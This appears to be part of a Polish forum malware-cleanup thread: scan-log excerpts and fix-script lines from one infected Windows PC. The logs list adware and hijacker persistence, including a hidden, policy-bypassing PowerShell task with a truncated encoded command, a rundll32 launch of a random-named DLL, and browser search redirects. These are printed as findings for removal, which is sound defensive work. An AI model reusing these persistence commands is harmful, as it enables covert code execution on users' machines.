13 Sty 2016, 12:05
14 Sty 2016, 15:32
Task: {15CAB8AB-7FAB-4C96-B1C0-B7CC5E8A2CA0} - System32\Tasks\{050E7A47-0E0D-090D-0511-787E0579110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AG
Task: {1DF81B3F-D09C-4F02-A283-2E63E1623AE9} - System32\Tasks\{4E2330BE-2D41-4F0D-A203-AD776859650D} => pcalua.exe -a C:\Users\DEJF\AppData\Roaming\istartsurf\UninstallManager.exe -c -ptid=cor
C:\Users\DEJF\AppData\Roaming\istartsurf
Task: {51DEE22D-EF7C-4295-8293-EA94A0C8DD09} - \Pool Style Brak pliku <==== UWAGA
Task: {5F4901F9-04C9-457A-A1C4-B25FD45668FD} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update Brak pliku <==== UWAGA
Task: {68FCE4B1-E6E3-4F2D-B553-6ED5AA1D57A7} - \IBUpd Brak pliku <==== UWAGA
Task: {6DAF01D2-6171-4809-A0FF-6B1EEA3F4527} - System32\Tasks\Pool Style2 => Rundll32.exe "C:\Users\DEJF\AppData\Local\Pool Style\{C6EA6F99-C9AE-B7DC-4DDB-8F235D6241BD}\jquksnv.dll",#1 <==== UWAGA
C:\Users\DEJF\AppData\Local\Pool Style
Task: {7D096803-2FE9-47FD-A146-3BD1FB5D7DBD} - \SystemHealer Monitor Brak pliku <==== UWAGA
Task: {BB7944B6-BD3F-4030-BDDE-1847EEC7717A} - \SwiftSearch Auto Updater 1.10.0.25 Core Brak pliku <==== UWAGA
Task: {CF48AB2D-00BE-47E1-A00E-B795CBBC134F} - \System HealerPeriod Brak pliku <==== UWAGA
Task: {F0DA6939-06AF-4C45-AD20-86C9C340A470} - \System HealerStartUp Brak pliku <==== UWAGA
Task: {FE364346-52D9-4381-B358-54E3A2832E7F} - \System Healer Task Brak pliku <==== UWAGA
SearchScopes: HKU\S-1-5-21-2343221109-3401111820-3028910219-1000 {6CF5B8C3-FE11-45FE-866F-04ADE1353751} URL = hxxp://www.search.ask.com/web?tpid=SGTSP1-MED&o=APN11004&pf=V7&p2=^B3Q^aaa328^BX^PL&gct=&itbv=12.37.0.2824&apn_uid=651CBC0F-E999-429F-9C85-43198B1DC87D&apn_ptnrs=^B3Q&apn_dtid=^aaa328^BX^PL&apn_dbr=&doi=2015-11-28&trgb=IE&q={searchTerms}&psv=&pt=tb
CHR HomePage: Default search.mpc.am
CHR StartupUrls: Default "search.mpc.am"
CHR DefaultSearchURL: Default hxxp://search.mpc.am?q={searchTerms}&cx=partner-pub-3796753109442372:3837783968
CHR DefaultSearchKeyword: Default mpc safe search
S2 vmserve; "C:\Program Files (x86)\Common Update\vmserve Update\vmserve.exe" {79740E79-A383-47A7-B513-3DF6563D007F} {A16B1AF7-982D-40C3-B5C1-633E1A6A6678} [X]
S1 MPCKpt; system32\DRIVERS\MPCKpt.sys [X]
2016-01-11 20:52 - 2016-01-11 21:06 - 00000000 ____D C:\ProgramData\d3384380-7617-0
2016-01-11 20:52 - 2016-01-11 21:06 - 00000000 ____D C:\ProgramData\d3384380-25c5-1
2016-01-11 20:52 - 2016-01-11 20:52 - 00023014 _____ C:\Windows\System32\Tasks\{050E7A47-0E0D-090D-0511-787E0579110C}
2016-01-11 20:48 - 2016-01-11 21:07 - 00003086 _____ C:\Windows\System32\Tasks\{362D0B12-2AD2-46E6-8C80-105A4592BB7F}
EmptyTemp:
14 Sty 2016, 18:13
16 Sty 2016, 22:37
Task: {AAEB6E07-75E4-4FAA-A867-F14611873AB6} - \{362D0B12-2AD2-46E6-8C80-105A4592BB7F} Brak pliku <==== UWAGA
HKU\S-1-5-21-2343221109-3401111820-3028910219-1000\...\Run: [Xvid] => C:\Program Files (x86)\Xvid\CheckUpdate.exe [8192 2011-01-17] ()
DeleteQuarantine:
16 Sty 2016, 23:59